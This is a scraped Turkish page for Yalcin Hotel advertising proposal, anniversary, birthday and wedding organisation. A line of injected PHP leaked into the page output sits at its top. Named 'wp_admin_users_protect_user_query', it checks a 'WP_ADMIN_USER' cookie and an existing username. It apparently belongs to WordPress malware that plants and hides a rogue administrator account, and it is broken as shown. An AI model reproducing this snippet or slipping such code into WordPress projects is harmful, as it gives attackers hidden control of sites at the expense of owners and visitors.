if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Blog Classic v1 – Yalcin Hotel

Blog Classic v1

Evlilik Teklifi Organizasyonu

Evlilik Teklifi Organizasyonu Sektörde bulunduğumuz uzun yıllar boyunca, gerçekleştirdiğimiz  evlilik teklifi organizasyonu sonrası edindiğimiz deneyimler ve yaratıcı fikirlerimiz ile yanınızdayız. Hayalini kurduğunuz, eş adayınızın yıllarca unutamayacağı bir evlenme teklifi organizasyonuna hazır olun. Muğla’nın belki de nostaljik ara sokaklarında ya da birbirinden güzel sahillerinde, sevdiğiniz ile birlikte muhteşem bir gün yaşayacağınızın garantisini veriyoruz.

Evlilik Teklifinde Farklılık Yarat!

Evlilik Yıl Dönümü

evlilik, kadın ve erkek hepimizin hayatında dönüm noktası olan önemli bir olay. bundan sonra ölünceye kadar yaşayacağımız her hadise açısından bir çok şeyin başlangıcı, bir çok şeyin de sonu belki.

evli olan herkes, eğer kendi eşiyle evlenmemiş olsaydı, hepsinin hayatı farklı olacaktı.. ama nasıl? bilinmeyen bu işte.. ona da kader diyoruz…

“eski yeni bütün evliler için evlilik yıldönümlerinin mutlulukla dolu olmasını diliyorum.

Doğum Günü Organizasyonu

Doğum Günü Partileriniz için birbirinden özel tasarımlar hazırlamaktayız. Tamamen arzunuza göre tasarladığımız konsept çeşitlerimizle özel günlerinize farklılık katmak için çalışıyoruz.

“Çocuğunuz veya sevdikleriniz için, unutulmaz doğum günü partileri hazırlamak istiyorsanız biz buradayız.

Düğün Organizasyonu

Düğün organizasyonu yapılır.Rüya Gibi Bir Düğün İçin Sizi Bekliyoruz

Dügün Organizasyonu konusunda uzman kadromuzla sizlere en kaliteli hizmeti  sunmaktan gurur duymaktayız.

Rüya Gibi Bir Düğün İçin Sizi Bekliyoruz”

Düğün organize etmek için  düğün yapılacak alanın ayarlanması ve bunun gibi hazırlıkların yapılması için size yardımcı olmaktayız.

TR